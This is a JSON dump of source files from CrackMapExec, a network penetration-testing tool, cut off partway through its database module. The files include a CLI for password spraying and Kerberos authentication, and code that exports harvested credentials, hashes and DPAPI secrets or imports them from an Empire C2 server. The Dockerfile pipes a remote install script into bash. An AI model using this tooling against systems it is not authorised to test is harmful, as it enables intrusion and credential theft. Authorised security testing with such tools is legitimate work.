[ { "path": ".dockerignore", "content": "tests\nDockerfile\n*.pyc\n*.pyo\n*.pyd\n__pycache__\n.vscode\n.venv\n.github\nbuild\nbin\ndist\n*.egg-info\ncme/data/powersploit/Recon/Dictionaries\ncme/data/powersploit/Exfiltration/NTFSParser\ncme/data/powersploit/CodeExecution/Invoke-ReflectivePEInjection_Resources\ncme/data/powersploit/Exfiltration/LogonUser\ncme/data/powersploit/Tests\ncme/data/netripper/DLL\ncme/data/netripper/Metasploit\ncme/data/netripper/NetRipper\ncme/data/netripper/Win32\ncme/data/netripper/Release\ncme/data/netripper/minhook\ncme/data/netripper/x64\ncme/data/netripper/*.pdf\ncme/data/netripper/*.sln\ncme/data/invoke-vnc/winvnc\ncme/data/invoke-vnc/vncdll\ncme/data/invoke-vnc/pebytes.ps1\ncme/data/invoke-vnc/ReflectiveDLLInjection\ncme/data/invoke-vnc/*.py\ncme/data/invoke-vnc/*.bat\ncme/data/invoke-vnc/*.msbuild\ncme/data/invoke-vnc/*.sln\ncme/data/RID-Hijacking/modules\ncme/data/RID-Hijacking/slides" }, { "path": ".github/ISSUE_TEMPLATE/bug_report.md", "content": "---\nname: Bug report\nabout: Create a report to help us improve\ntitle: ''\nlabels: ''\nassignees: ''\n\n---\n\n**Describe the bug**\nA clear and concise description of what the bug is.\n\n**To Reproduce**\nSteps to reproduce the behavior i.e.:\nCommand: `crackmapexec smb -u username -p password`\nResulted in:\n```\ncrackmapexec smb 10.10.10.10 -u username -p password -x \"whoami\"\nSMB 10.10.10.10 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:domain) (signing:True) (SMBv1:False)\nSMB 10.10.10.10 445 DC01 [+] domain\\username:password\nTraceback (most recent call last):\n...\n```\n\n**Expected behavior**\nA clear and concise description of what you expected to happen.\n\n**Screenshots**\nIf applicable, add screenshots to help explain your problem.\n\n**Crackmapexec info**\n - OS: [e.g. Kali]\n - Version of CME [e.g. v5.0.2]\n - Installed from: apt/github/pip/docker/...? Please try with latest release before openning an issue\n\n**Additional context**\nAdd any other context about the problem here.\n" }, { "path": ".github/workflows/crackmapexec-test.yml", "content": "name: CrackMapExec Tests\n\non:\n workflow_dispatch:\n push:\n branches: [ master ]\n pull_request:\n branches: [ master ]\n\njobs:\n build:\n name: CrackMapExec Tests for Py${{ matrix.python-version }}\n runs-on: ${{ matrix.os }}\n strategy:\n max-parallel: 4\n matrix:\n os: [ubuntu-latest]\n python-version: [\"3.7\", \"3.8\", \"3.9\", \"3.10\", \"3.11\"]\n steps:\n - uses: actions/checkout@v3\n - name: CrackMapExec tests on ${{ matrix.os }}\n uses: actions/setup-python@v4\n with:\n python-version: ${{ matrix.python-version }}\n - name: Install poetry\n run: |\n pipx install poetry --python python${{ matrix.python-version }}\n poetry --version\n poetry env info\n - name: Install librairies with dev group\n run: |\n poetry install --with dev\n - name: Run the e2e test\n run: |\n poetry run pytest tests\n" }, { "path": ".github/workflows/crackmapexec.yml", "content": "name: CrackMapExec Tests & Build\n\non:\n workflow_dispatch:\n branches: [ main ]\n push:\n branches: [ main ]\n pull_request:\n branches: [ main ]\n\njobs:\n build:\n name: CrackMapExec Tests on ${{ matrix.os }}\n runs-on: ${{ matrix.os }}\n strategy:\n max-parallel: 4\n matrix:\n os: [ubuntu-latest, macOS-latest, windows-latest]\n python-version: [\"3.8\", \"3.9\", \"3.10\", \"3.11\"]\n steps:\n - uses: actions/checkout@v3\n - name: CrackMapExec tests on ${{ matrix.os }}\n uses: actions/setup-python@v4\n with:\n python-version: ${{ matrix.python-version }}\n - name: Build binaries with Shiv\n run: |\n pip install shiv\n python build_collector.py\n - name: Upload cme binary\n uses: actions/upload-artifact@master\n with:\n name: cme-${{ matrix.os }}-${{ matrix.python-version }}\n path: bin/cme\n - name: Upload cmedb binary\n uses: actions/upload-artifact@master\n with:\n name: cmedb-${{ matrix.os }}-${{ matrix.python-version }}\n path: bin/cmedb\n" }, { "path": ".gitignore", "content": "data/cme.db\n*.bak\n*.log\n.venv\n.vscode\n.idea\n# Byte-compiled / optimized / DLL files\n__pycache__/\n*.py[cod]\nbin/\n\n\n# C extensions\n*.so\n\n# Distribution / packaging\n.Python\nenv/\nbuild/\ndevelop-eggs/\ndist/\ndownloads/\neggs/\n.eggs/\nlib/\nlib64/\nparts/\nsdist/\nvar/\n*.egg-info/\n.installed.cfg\n*.egg\n\n# PyInstaller\n# Usually these files are written by a python script from a template\n# before PyInstaller builds the exe, so as to inject date/other infos into it.\n*.manifest\n*.spec\n!crackmapexec.spec\n\n# Installer logs\npip-log.txt\npip-delete-this-directory.txt\n\n# Unit test / coverage reports\nhtmlcov/\n.tox/\n.coverage\n.coverage.*\n.cache\nnosetests.xml\ncoverage.xml\n*,cover\n\n# Translations\n*.mo\n*.pot\n\n# Django stuff:\n*.log\n\n# Sphinx documentation\ndocs/_build/\n\n# PyBuilder\ntarget/\n" }, { "path": ".gitmodules", "content": "" }, { "path": "Dockerfile", "content": "FROM python:3.11-slim\n\nENV LANG=C.UTF-8\nENV LC_ALL=C.UTF-8\nENV PIP_NO_CACHE_DIR=off\n\nWORKDIR /usr/src/crackmapexec\n\nRUN apt-get update && \\\n apt-get install -y libffi-dev libxml2-dev libxslt-dev libssl-dev openssl autoconf g++ python3-dev curl git\nRUN apt-get update\n# Get Rust\nRUN curl https://sh.rustup.rs -sSf | bash -s -- -y\n# Add .cargo/bin to PATH\nENV PATH=\"/root/.cargo/bin:${PATH}\"\n# Check cargo is visible\nRUN cargo --help\n\nCOPY . .\nRUN pip install .\n\nENTRYPOINT [ \"cme\" ]\n" }, { "path": "LICENSE", "content": "Copyright (c) 2022, byt3bl33d3r, mpgn_x64\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n" }, { "path": "Makefile", "content": ".PHONY: tests\n\ndefault: build\n\nclean:\n\trm -f -r build/\n\trm -f -r bin/\n\trm -f -r dist/\n\tfind . -name '*.pyc' -exec rm -f {} +\n\tfind . -name '*.pyo' -exec rm -f {} +\n\tfind . -name '*~' -exec rm -f {} +\n\tfind . -name '__pycache__' -exec rm -rf {} +\n\tfind . -name '.pytest_cache' -exec rm -rf {} +\n\ntests:\n\tflake8 . --count --select=E9,F63,F7,F82 --show-source --statistics --exclude cme/data/*\n\nrequirements:\n\tpoetry export --without-hashes -f requirements.txt -o requirements.txt\n\tpoetry export --without-hashes --dev -f requirements.txt -o requirements-dev.txt" }, { "path": "README.md", "content": "# No Longer Maintained\n\nThis project is no longer mantained due to the existence of a hostile fork.\n\n# CrackMapExec\n\n

\n \"cme\"/\n

\n\nYou are on the **latest up-to-date** repository of the project CrackMapExec ! 🎉\n\n- 🚧 If you want to report a problem, open un [Issue](https://github.com/mpgn/CrackMapExec/issues) \n- 🔀 If you want to contribute, open a [Pull Request](https://github.com/mpgn/CrackMapExec/pulls)\n- 💬 If you want to discuss, open a [Discussion](https://github.com/mpgn/CrackMapExec/discussions)\n\n# Acknowledgments\n**(These are the people who did the hard stuff)**\n\nThis project was originally inspired by:\n- [CredCrack](https://github.com/gojhonny/CredCrack)\n- [smbexec](https://github.com/pentestgeek/smbexec)\n- [smbmap](https://github.com/ShawnDEvans/smbmap)\n\nUnintentional contributors:\n\n- The [Empire](https://github.com/PowerShellEmpire/Empire) project\n- @T-S-A's [smbspider](https://github.com/T-S-A/smbspider) script\n- @ConsciousHacker's partial Python port of Invoke-obfuscation from the [GreatSCT](https://github.com/GreatSCT/GreatSCT) project\n\n# Documentation, Tutorials, Examples\nSee the project's [wiki](https://www.crackmapexec.wiki/) for documentation and usage examples\n\n# Installation\nPlease see the installation instructions on the [official wiki](https://www.crackmapexec.wiki/getting-started/installation)\n\n# Code Contributors\n\nAwesome code contributors of CME:\n\n[![](https://github.com/Marshall-Hallenbeck.png?size=50)](https://github.com/Marshall-Hallenbeck)\n[![](https://github.com/zblurx.png?size=50)](https://github.com/zblurx)\n[![](https://github.com/NeffIsBack.png?size=50)](https://github.com/NeffIsBack)\n[![](https://github.com/Hackndo.png?size=50)](https://github.com/Hackndo)\n[![](https://github.com/nurfed1?size=50)](https://github.com/nurfed1)\n\n\n# To do\n- ~~0wn everything~~\n" }, { "path": "build_collector.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport time\nfrom datetime import datetime\nfrom pathlib import Path\n\nfrom shiv.bootstrap import Environment\n\n# from distutils.ccompiler import new_compiler\nfrom shiv.builder import create_archive\nfrom shiv.cli import __version__ as VERSION\n\n\ndef build_cme():\n print(\"building CME\")\n try:\n shutil.rmtree(\"bin\")\n shutil.rmtree(\"build\")\n except Exception as e:\n pass\n\n try:\n print(\"remove useless files\")\n os.mkdir(\"build\")\n os.mkdir(\"bin\")\n shutil.copytree(\"cme\", \"build/cme\")\n\n except Exception as e:\n print(e)\n return\n\n subprocess.run(\n [\n sys.executable,\n \"-m\",\n \"pip\",\n \"install\",\n \"-e\",\n \".\",\n \"-t\",\n \"build\",\n ],\n check=True,\n )\n\n # [shutil.rmtree(p) for p in Path(\"build\").glob(\"**/__pycache__\")]\n [shutil.rmtree(p) for p in Path(\"build\").glob(\"**/*.dist-info\")]\n\n env = Environment(\n built_at=datetime.utcfromtimestamp(int(time.time())).strftime(\"%Y-%m-%d %H:%M:%S\"),\n entry_point=\"cme.crackmapexec:main\",\n script=None,\n compile_pyc=False,\n extend_pythonpath=True,\n shiv_version=VERSION,\n )\n create_archive(\n [Path(\"build\").absolute()],\n Path(\"bin/cme\"),\n \"/usr/bin/env -S python -sE\",\n \"_bootstrap:bootstrap\",\n env,\n True,\n )\n\n\ndef build_cmedb():\n print(\"building CMEDB\")\n env = Environment(\n built_at=datetime.utcfromtimestamp(int(time.time())).strftime(\"%Y-%m-%d %H:%M:%S\"),\n entry_point=\"cme.cmedb:main\",\n script=None,\n compile_pyc=False,\n extend_pythonpath=True,\n shiv_version=VERSION,\n )\n create_archive(\n [Path(\"build\").absolute()],\n Path(\"bin/cmedb\"),\n \"/usr/bin/env -S python -sE\",\n \"_bootstrap:bootstrap\",\n env,\n True,\n )\n\n\nif __name__ == \"__main__\":\n try:\n build_cme()\n build_cmedb()\n except:\n pass\n finally:\n shutil.rmtree(\"build\")\n" }, { "path": "cme/.hooks/hook-lsassy.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom PyInstaller.utils.hooks import collect_all\n\ndatas, binaries, hiddenimports = collect_all(\"lsassy\")\n" }, { "path": "cme/__init__.py", "content": "" }, { "path": "cme/cli.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport sys\nfrom argparse import RawTextHelpFormatter\nfrom cme.loaders.protocolloader import ProtocolLoader\nfrom cme.helpers.logger import highlight\nfrom termcolor import colored\nfrom cme.logger import cme_logger\nimport importlib.metadata\n\n\ndef gen_cli_args():\n VERSION = importlib.metadata.version(\"crackmapexec\")\n CODENAME = \"John Wick\"\n\n parser = argparse.ArgumentParser(description=f\"\"\"\n ______ .______ ___ ______ __ ___ .___ ___. ___ .______ _______ ___ ___ _______ ______\n / || _ \\ / \\ / || |/ / | \\/ | / \\ | _ \\ | ____|\\ \\ / / | ____| / |\n | ,----'| |_) | / ^ \\ | ,----'| ' / | \\ / | / ^ \\ | |_) | | |__ \\ V / | |__ | ,----'\n | | | / / /_\\ \\ | | | < | |\\/| | / /_\\ \\ | ___/ | __| > < | __| | |\n | `----.| |\\ \\----. / _____ \\ | `----.| . \\ | | | | / _____ \\ | | | |____ / . \\ | |____ | `----.\n \\______|| _| `._____|/__/ \\__\\ \\______||__|\\__\\ |__| |__| /__/ \\__\\ | _| |_______|/__/ \\__\\ |_______| \\______|\n\n A swiss army knife for pentesting networks\n Forged by @byt3bl33d3r and @mpgn_x64 using the powah of dank memes\n\n {highlight('Version', 'red')} : {highlight(VERSION)}\n {highlight('Codename', 'red')}: {highlight(CODENAME)}\n\"\"\",\n formatter_class=RawTextHelpFormatter,\n )\n\n parser.add_argument(\n \"-t\",\n type=int,\n dest=\"threads\",\n default=100,\n help=\"set how many concurrent threads to use (default: 100)\",\n )\n parser.add_argument(\n \"--timeout\",\n default=None,\n type=int,\n help=\"max timeout in seconds of each thread (default: None)\",\n )\n parser.add_argument(\n \"--jitter\",\n metavar=\"INTERVAL\",\n type=str,\n help=\"sets a random delay between each connection (default: None)\",\n )\n parser.add_argument(\n \"--no-progress\",\n action=\"store_true\",\n help=\"Not displaying progress bar during scan\",\n )\n parser.add_argument(\"--verbose\", action=\"store_true\", help=\"enable verbose output\")\n parser.add_argument(\"--debug\", action=\"store_true\", help=\"enable debug level information\")\n parser.add_argument(\"--version\", action=\"store_true\", help=\"Display CME version\")\n\n # we do module arg parsing here so we can reference the module_list attribute below\n module_parser = argparse.ArgumentParser(add_help=False)\n mgroup = module_parser.add_mutually_exclusive_group()\n mgroup.add_argument(\"-M\", \"--module\", action=\"append\", metavar=\"MODULE\", help=\"module to use\")\n module_parser.add_argument(\n \"-o\",\n metavar=\"MODULE_OPTION\",\n nargs=\"+\",\n default=[],\n dest=\"module_options\",\n help=\"module options\",\n )\n module_parser.add_argument(\"-L\", \"--list-modules\", action=\"store_true\", help=\"list available modules\")\n module_parser.add_argument(\n \"--options\",\n dest=\"show_module_options\",\n action=\"store_true\",\n help=\"display module options\",\n )\n module_parser.add_argument(\n \"--server\",\n choices={\"http\", \"https\"},\n default=\"https\",\n help=\"use the selected server (default: https)\",\n )\n module_parser.add_argument(\n \"--server-host\",\n type=str,\n default=\"0.0.0.0\",\n metavar=\"HOST\",\n help=\"IP to bind the server to (default: 0.0.0.0)\",\n )\n module_parser.add_argument(\n \"--server-port\",\n metavar=\"PORT\",\n type=int,\n help=\"start the server on the specified port\",\n )\n module_parser.add_argument(\n \"--connectback-host\",\n type=str,\n metavar=\"CHOST\",\n help=\"IP for the remote system to connect back to (default: same as server-host)\",\n )\n\n subparsers = parser.add_subparsers(title=\"protocols\", dest=\"protocol\", description=\"available protocols\")\n\n std_parser = argparse.ArgumentParser(add_help=False)\n std_parser.add_argument(\n \"target\",\n nargs=\"+\" if not (module_parser.parse_known_args()[0].list_modules or module_parser.parse_known_args()[0].show_module_options) else \"*\",\n type=str,\n help=\"the target IP(s), range(s), CIDR(s), hostname(s), FQDN(s), file(s) containing a list of targets, NMap XML or .Nessus file(s)\",\n )\n std_parser.add_argument(\n \"-id\",\n metavar=\"CRED_ID\",\n nargs=\"+\",\n default=[],\n type=str,\n dest=\"cred_id\",\n help=\"database credential ID(s) to use for authentication\",\n )\n std_parser.add_argument(\n \"-u\",\n metavar=\"USERNAME\",\n dest=\"username\",\n nargs=\"+\",\n default=[],\n help=\"username(s) or file(s) containing usernames\",\n )\n std_parser.add_argument(\n \"-p\",\n metavar=\"PASSWORD\",\n dest=\"password\",\n nargs=\"+\",\n default=[],\n help=\"password(s) or file(s) containing passwords\",\n )\n std_parser.add_argument(\"-k\", \"--kerberos\", action=\"store_true\", help=\"Use Kerberos authentication\")\n std_parser.add_argument(\"--no-bruteforce\", action=\"store_true\", help=\"No spray when using file for username and password (user1 => password1, user2 => password2\")\n std_parser.add_argument(\"--continue-on-success\", action=\"store_true\", help=\"continues authentication attempts even after successes\")\n std_parser.add_argument(\n \"--use-kcache\",\n action=\"store_true\",\n help=\"Use Kerberos authentication from ccache file (KRB5CCNAME)\",\n )\n std_parser.add_argument(\"--log\", metavar=\"LOG\", help=\"Export result into a custom file\")\n std_parser.add_argument(\n \"--aesKey\",\n metavar=\"AESKEY\",\n nargs=\"+\",\n help=\"AES key to use for Kerberos Authentication (128 or 256 bits)\",\n )\n std_parser.add_argument(\n \"--kdcHost\",\n metavar=\"KDCHOST\",\n help=\"FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter\",\n )\n\n fail_group = std_parser.add_mutually_exclusive_group()\n fail_group.add_argument(\n \"--gfail-limit\",\n metavar=\"LIMIT\",\n type=int,\n help=\"max number of global failed login attempts\",\n )\n fail_group.add_argument(\n \"--ufail-limit\",\n metavar=\"LIMIT\",\n type=int,\n help=\"max number of failed login attempts per username\",\n )\n fail_group.add_argument(\n \"--fail-limit\",\n metavar=\"LIMIT\",\n type=int,\n help=\"max number of failed login attempts per host\",\n )\n\n p_loader = ProtocolLoader()\n protocols = p_loader.get_protocols()\n\n for protocol in protocols.keys():\n try:\n protocol_object = p_loader.load_protocol(protocols[protocol][\"argspath\"])\n subparsers = protocol_object.proto_args(subparsers, std_parser, module_parser)\n except:\n cme_logger.exception(f\"Error loading proto_args from proto_args.py file in protocol folder: {protocol}\")\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n args = parser.parse_args()\n\n if args.version:\n print(f\"{VERSION} - {CODENAME}\")\n sys.exit(1)\n\n return args\n" }, { "path": "cme/cmedb.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport cmd\nimport configparser\nimport csv\nimport os\nfrom os import listdir\nfrom os.path import exists\nfrom os.path import join as path_join\nimport shutil\nfrom sqlite3 import connect\nimport sys\nfrom textwrap import dedent\n\nfrom requests import get, post, ConnectionError\nfrom sqlalchemy import create_engine\nfrom terminaltables import AsciiTable\n\nfrom cme.loaders.protocolloader import ProtocolLoader\nfrom cme.paths import CONFIG_PATH, WS_PATH, WORKSPACE_DIR\n\n\nclass UserExitedProto(Exception):\n pass\n\n\ndef create_db_engine(db_path):\n db_engine = create_engine(f\"sqlite:///{db_path}\", isolation_level=\"AUTOCOMMIT\", future=True)\n return db_engine\n\n\ndef print_table(data, title=None):\n print(\"\")\n table = AsciiTable(data)\n if title:\n table.title = title\n print(table.table)\n print(\"\")\n\n\ndef write_csv(filename, headers, entries):\n \"\"\"\n Writes a CSV file with the provided parameters.\n \"\"\"\n with open(os.path.expanduser(filename), \"w\") as export_file:\n csv_file = csv.writer(\n export_file,\n delimiter=\";\",\n quoting=csv.QUOTE_ALL,\n lineterminator=\"\\n\",\n escapechar=\"\\\\\",\n )\n csv_file.writerow(headers)\n for entry in entries:\n csv_file.writerow(entry)\n\n\ndef write_list(filename, entries):\n \"\"\"\n Writes a file with a simple list\n \"\"\"\n with open(os.path.expanduser(filename), \"w\") as export_file:\n for line in entries:\n export_file.write(line + \"\\n\")\n return\n\n\ndef complete_import(text, line):\n \"\"\"\n Tab-complete 'import' commands\n \"\"\"\n commands = (\"empire\", \"metasploit\")\n mline = line.partition(\" \")[2]\n offs = len(mline) - len(text)\n return [s[offs:] for s in commands if s.startswith(mline)]\n\n\ndef complete_export(text, line):\n \"\"\"\n Tab-complete 'creds' commands.\n \"\"\"\n commands = (\n \"creds\",\n \"plaintext\",\n \"hashes\",\n \"shares\",\n \"local_admins\",\n \"signing\",\n \"keys\",\n )\n mline = line.partition(\" \")[2]\n offs = len(mline) - len(text)\n return [s[offs:] for s in commands if s.startswith(mline)]\n\n\ndef print_help(help_string):\n print(dedent(help_string))\n\n\nclass DatabaseNavigator(cmd.Cmd):\n def __init__(self, main_menu, database, proto):\n cmd.Cmd.__init__(self)\n self.main_menu = main_menu\n self.config = main_menu.config\n self.proto = proto\n self.db = database\n self.prompt = f\"cmedb ({main_menu.workspace})({proto}) > \"\n\n def do_exit(self, line):\n self.db.shutdown_db()\n sys.exit()\n\n @staticmethod\n def help_exit():\n help_string = \"\"\"\n Exits\n \"\"\"\n print_help(help_string)\n\n def do_back(self, line):\n raise UserExitedProto\n\n def do_export(self, line):\n if not line:\n print(\"[-] not enough arguments\")\n return\n line = line.split()\n command = line[0].lower()\n # Need to use if/elif/else to keep compatibility with py3.8/3.9\n # Reference DB Function cme/protocols/smb/database.py\n # Users\n if command == \"creds\":\n if len(line) < 3:\n print(\"[-] invalid arguments, export creds \")\n return\n\n filename = line[2]\n creds = self.db.get_credentials()\n csv_header = (\n \"id\",\n \"domain\",\n \"username\",\n \"password\",\n \"credtype\",\n \"pillaged_from\",\n )\n\n if line[1].lower() == \"simple\":\n write_csv(filename, csv_header, creds)\n elif line[1].lower() == \"detailed\":\n formatted_creds = []\n\n for cred in creds:\n entry = [\n cred[0], # ID\n cred[1], # Domain\n cred[2], # Username\n cred[3], # Password/Hash\n cred[4], # Cred Type\n ]\n if cred[5] is None:\n entry.append(\"\")\n else:\n entry.append(self.db.get_hosts(cred[5])[0][2])\n formatted_creds.append(entry)\n write_csv(filename, csv_header, formatted_creds)\n elif line[1].lower() == \"hashcat\":\n usernames = []\n passwords = []\n for cred in creds:\n if cred[4] == \"hash\":\n usernames.append(cred[2])\n passwords.append(cred[3])\n output_list = [':'.join(combination) for combination in zip(usernames, passwords)]\n write_list(filename, output_list)\n else:\n print(f\"[-] No such export option: {line[1]}\")\n return\n print(\"[+] Creds exported\")\n # Hosts\n elif command == \"hosts\":\n if len(line) < 3:\n print(\"[-] invalid arguments, export hosts \")\n return\n\n csv_header_simple = (\n \"id\",\n \"ip\",\n \"hostname\",\n \"domain\",\n \"os\",\n \"dc\",\n \"smbv1\",\n \"signing\",\n )\n csv_header_detailed = (\n \"id\",\n \"ip\",\n \"hostname\",\n \"domain\",\n \"os\",\n \"dc\",\n \"smbv1\",\n \"signing\",\n \"spooler\",\n \"zerologon\",\n \"petitpotam\",\n )\n filename = line[2]\n\n if line[1].lower() == \"simple\":\n hosts = self.db.get_hosts()\n simple_hosts = [host[:8] for host in hosts]\n write_csv(filename, csv_header_simple, simple_hosts)\n # TODO: maybe add more detail like who is an admin on it, shares discovered, etc\n elif line[1].lower() == \"detailed\":\n hosts = self.db.get_hosts()\n write_csv(filename, csv_header_detailed, hosts)\n elif line[1].lower() == \"signing\":\n hosts = self.db.get_hosts(\"signing\")\n signing_hosts = [host[1] for host in hosts]\n write_list(filename, signing_hosts)\n else:\n print(f\"[-] No such export option: {line[1]}\")\n return\n print(\"[+] Hosts exported\")\n # Shares\n elif command == \"shares\":\n if len(line) < 3:\n print(\"[-] invalid arguments, export shares \")\n return\n\n shares = self.db.get_shares()\n csv_header = (\"id\", \"host\", \"userid\", \"name\", \"remark\", \"read\", \"write\")\n filename = line[2]\n\n if line[1].lower() == \"simple\":\n write_csv(filename, csv_header, shares)\n print(\"[+] shares exported\")\n # Detailed view gets hostname, usernames, and true false statement\n elif line[1].lower() == \"detailed\":\n formatted_shares = []\n for share in shares:\n user = self.db.get_users(share[2])[0]\n if self.db.get_hosts(share[1]): \n share_host = self.db.get_hosts(share[1])[0][2] \n else: \n share_host = \"ERROR\"\n\n entry = (\n share[0], # shareID\n share_host, # hosts\n f\"{user[1]}\\{user[2]}\", # userID\n share[3], # name\n share[4], # remark\n bool(share[5]), # read\n bool(share[6]), # write\n )\n formatted_shares.append(entry)\n write_csv(filename, csv_header, formatted_shares)\n print(\"[+] Shares exported\")\n else:\n print(f\"[-] No such export option: {line[1]}\")\n return\n # Local Admin\n elif command == \"local_admins\":\n if len(line) < 3:\n print(\"[-] invalid arguments, export local_admins \")\n return\n\n # These values don't change between simple and detailed\n local_admins = self.db.get_admin_relations()\n csv_header = (\"id\", \"userid\", \"host\")\n filename = line[2]\n\n if line[1].lower() == \"simple\":\n write_csv(filename, csv_header, local_admins)\n elif line[1].lower() == \"detailed\":\n formatted_local_admins = []\n for entry in local_admins:\n user = self.db.get_users(filter_term=entry[1])[0]\n\n formatted_entry = (\n entry[0], # Entry ID\n f\"{user[1]}/{user[2]}\", # DOMAIN/Username\n self.db.get_hosts(filter_term=entry[2])[0][2], # Hostname\n )\n # Can't modify a tuple which is what self.db.get_admin_relations() returns\n formatted_local_admins.append(formatted_entry)\n write_csv(filename, csv_header, formatted_local_admins)\n else:\n print(f\"[-] No such export option: {line[1]}\")\n return\n print(\"[+] Local Admins exported\")\n elif command == \"dpapi\":\n if len(line) < 3:\n print(\"[-] invalid arguments, export dpapi \")\n return\n\n # These values don't change between simple and detailed\n dpapi_secrets = self.db.get_dpapi_secrets()\n csv_header = (\n \"id\",\n \"host\",\n \"dpapi_type\",\n \"windows_user\",\n \"username\",\n \"password\",\n \"url\",\n )\n filename = line[2]\n\n if line[1].lower() == \"simple\":\n write_csv(filename, csv_header, dpapi_secrets)\n elif line[1].lower() == \"detailed\":\n formatted_dpapi_secret = []\n for entry in dpapi_secrets:\n formatted_entry = (\n entry[0], # Entry ID\n self.db.get_hosts(filter_term=entry[1])[0][2], # Hostname\n entry[2], # DPAPI type\n entry[3], # Windows User\n entry[4], # Username\n entry[5], # Password\n entry[6], # URL\n )\n # Can't modify a tuple which is what self.db.get_admin_relations() returns\n formatted_dpapi_secret.append(formatted_entry)\n write_csv(filename, csv_header, formatted_dpapi_secret)\n else:\n print(f\"[-] No such export option: {line[1]}\")\n return\n print(\"[+] DPAPI secrets exported\")\n elif command == \"keys\":\n if line[1].lower() == \"all\":\n keys = self.db.get_keys()\n else:\n keys = self.db.get_keys(key_id=int(line[1]))\n writable_keys = [key[2] for key in keys]\n filename = line[2]\n write_list(filename, writable_keys)\n elif command == \"wcc\":\n if len(line) < 3:\n print(\"[-] invalid arguments, export wcc \")\n return\n\n csv_header_simple = (\n \"id\",\n \"ip\",\n \"hostname\",\n \"check\",\n \"status\",\n )\n csv_header_detailed = (\n \"id\",\n \"ip\",\n \"hostname\",\n \"check\",\n \"description\",\n \"status\",\n \"reasons\"\n )\n filename = line[2]\n host_mapping = {}\n check_mapping = {}\n\n hosts = self.db.get_hosts()\n checks = self.db.get_checks()\n check_results = self.db.get_check_results()\n rows = []\n\n for result_id,hostid,checkid,secure,reasons in check_results:\n row = [result_id]\n if hostid in host_mapping:\n row.extend(host_mapping[hostid])\n else:\n for host_id,ip,hostname,_,_,_,_,_,_,_,_ in hosts:\n if host_id == hostid:\n row.extend([ip, hostname])\n host_mapping[hostid] = [ip, hostname]\n break\n if checkid in check_mapping:\n row.extend(check_mapping[checkid])\n else:\n for check in checks:\n check_id, name, description = check\n if check_id == checkid:\n row.extend([name, description])\n check_mapping[checkid] = [name, description]\n break\n row.append('OK' if secure else 'KO')\n row.append(reasons)\n rows.append(row)\n\n if line[1].lower() == \"simple\":\n simple_rows = list((row[0], row[1], row[2], row[3], row[5]) for row in rows)\n write_csv(filename, csv_header_simple, simple_rows)\n elif line[1].lower() == \"detailed\":\n write_csv(filename, csv_header_detailed, rows)\n elif line[1].lower() == \"signing\":\n hosts = self.db.get_hosts(\"signing\")\n signing_hosts = [host[1] for host in hosts]\n write_list(filename, signing_hosts)\n else:\n print(f\"[-] No such export option: {line[1]}\")\n return\n print(\"[+] WCC exported\")\n else:\n print(\"[-] Invalid argument, specify creds, hosts, local_admins, shares, wcc or dpapi\")\n\n @staticmethod\n def help_export():\n help_string = \"\"\"\n export [creds|hosts|local_admins|shares|signing|keys] [simple|detailed|*] [filename]\n Exports information to a specified file\n \n * hosts has an additional third option from simple and detailed: signing - this simply writes a list of ips of\n hosts where signing is enabled\n * keys' third option is either \"all\" or an id of a key to export\n export keys [all|id] [filename]\n \"\"\"\n print_help(help_string)\n\n def do_import(self, line):\n if not line:\n return\n\n if line == \"empire\":\n headers = {\"Content-Type\": \"application/json\"}\n # Pull the username and password from the config file\n payload = {\n \"username\": self.config.get(\"Empire\", \"username\"),\n \"password\": self.config.get(\"Empire\", \"password\"),\n }\n # Pull the host and port from the config file\n base_url = f\"https://{self.config.get('Empire', 'api_host')}:{self.config.get('Empire', 'api_port')}\"\n\n try:\n r = post(\n base_url + \"/api/admin/login\",\n json=payload,\n headers=headers,\n verify=False,\n )\n if r.status_code == 200:\n token = r.json()[\"token\"]\n url_params = {\"token\": token}\n r = get(\n base_url + \"/api/creds\",\n headers=headers,\n params=url_params,\n verify=False,\n )\n creds = r.json()\n\n for cred in creds[\"creds\"]:\n if cred[\"credtype\"] == \"token\" or cred[\"credtype\"] == \"krbtgt\" or cred[\"username\"].endswith(\"$\"):\n continue\n self.db.add_credential(\n cred[\"credtype\"],\n cred[\"domain\"],\n cred[\"username\"],\n cred[\"password\"],\n )\n print(\"[+] Empire credential import successful\")\n else:\n print(\"[-] Error authenticating to Empire's RESTful API server!\")\n except ConnectionError as e:\n print(f\"[-] Unable to connect to Empire's RESTful API server: {e}\")\n\n\nclass CMEDBMenu(cmd.Cmd):\n def __init__(self, config_path):\n cmd.Cmd.__init__(self)\n self.config_path = config_path\n\n try:\n self.config = configparser.ConfigParser()\n self.config.read(self.config_path)\n except Exception as e:\n print(f\"[-] Error reading cme.conf: {e}\")\n 